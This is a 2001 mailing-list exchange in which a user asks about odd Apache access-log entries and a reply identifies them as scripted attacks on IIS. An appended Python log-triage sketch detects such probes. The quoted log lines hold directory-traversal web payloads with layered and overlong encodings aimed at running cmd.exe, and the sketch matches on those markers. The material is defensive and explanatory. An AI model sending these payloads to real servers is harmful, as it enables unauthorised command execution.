tomcat-users mailing list archives

From Herman Stevens <herman.stev...@ubizen.com>
Subject Re: Apache access.log - (whats going on)
Date Wed, 10 Oct 2001 10:25:43 GMT
You are under attack by a hacker (or probably a script kiddie that is using - without too much
knowledge - a script to attack your webserver).  The URLs in your logs are all
well-known attacks against an IIS web server.

Lars Nielsen Lind wrote:

> Hi.
>
> I have read my access.log (apache) and found several IPs as shown below. What's going on?
>
> /Lars Nielsen Lind
>
> 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"

--

Herman Stevens                Ubizen
Product Trainer               We Secure e-Business
Phone   +32 16 28 70 00       http://www.ubizen.com
Fax     +32 16 28 71 00       http://www.securitywatch.com
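
Added example, not part of the original thread: a log triage sketch in Python that flags requests like the ones quoted above by the markers visible in them (layered percent-encoding, bytes that are never valid UTF-8, `../` after decoding, a path ending in `cmd.exe` or `root.exe`) and counts per source IP how many were answered with a status below 400. The tag names, function names and the benign sample line are assumptions made for the illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Four requests copied from the quoted log, plus one constructed benign request.
SAMPLE = [
    '62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"',
    '62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"',
    '62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"',
    '62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"',
    '192.0.2.10 - - [10/Oct/2001:07:45:00 +0200] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')

def decode_layers(path, max_rounds=4):
    """Percent-decode until stable; return (bytes, rounds that changed the data)."""
    data, rounds = path.encode("utf-8"), 0
    while rounds < max_rounds:
        nxt = unquote_to_bytes(data)
        if nxt == data:
            break
        data, rounds = nxt, rounds + 1
    return data, rounds

def classify(line):
    """Return (ip, status, tags) for one access-log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    raw, rounds = decode_layers(target.split("?", 1)[0])
    norm = raw.replace(b"\\", b"/").lower()
    tags = set()
    if rounds > 1:
        tags.add("multi-encoded")      # e.g. %255c -> %5c -> backslash
    if b"\xc0" in raw or b"\xc1" in raw:
        tags.add("invalid-utf8")       # 0xC0/0xC1 never occur in valid UTF-8
    if b"../" in norm:
        tags.add("traversal")
    if norm.endswith((b"/cmd.exe", b"/root.exe")):
        tags.add("shell-probe")
    return ip, int(status), tags

def summarize(lines):
    """Per source IP: probe count, how many were answered below 400, tags seen."""
    report = {}
    for ip, status, tags in filter(None, map(classify, lines)):
        if tags:
            e = report.setdefault(ip, {"probes": 0, "served": 0, "tags": set()})
            e["probes"] += 1
            e["served"] += status < 400
            e["tags"] |= tags
    return report
```

A non-zero `served` count for a source is the entry to follow up first; in the log quoted above every probe was answered with 404 or 400.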

